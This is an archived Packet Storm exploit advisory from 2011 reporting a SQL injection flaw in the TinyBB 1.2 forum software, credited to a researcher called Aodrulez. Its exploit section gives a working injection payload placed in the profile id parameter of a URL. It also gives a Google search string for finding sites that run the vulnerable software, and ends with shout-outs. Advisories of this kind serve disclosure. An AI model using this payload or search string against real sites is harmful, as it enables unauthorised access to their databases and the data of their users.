TinyBB 1.2 SQL Injection

2011-01-10T00:00:00
ID PACKETSTORM:97387
Type packetstorm
Reporter Aodrulez
Modified 2011-01-10T00:00:00

Description

                                        
                                            `+-------------------------------+  
| TinyBB 1.2 SQLi Vulnerability |  
+-------------------------------+  
  
  
  
Vulnerable Web-App : TinyBB 1.2  
Vulnerability : SQL Injection.  
Author : Aodrulez.  
Email : f3arm3d3ar@gmail.com  
Google-Dork : "TinyBB 2011 all rights reserved"  
Tested on : Ubuntu 10.04  
  
+---------+  
| Exploit |  
+---------+  
  
TinyBB Version 1.2 is vulnerable to SQLi.  
  
http://127.0.0.1/index.php?page=profile&id=' or 'a'='a  
  
  
+-------------------+  
| Greetz Fly Out To |  
+-------------------+  
  
  
1] Amforked() : My Mentor.  
2] The Blue Genius : My Boss.  
3] www.orchidseven.com  
4] www.malcon.org   
  
`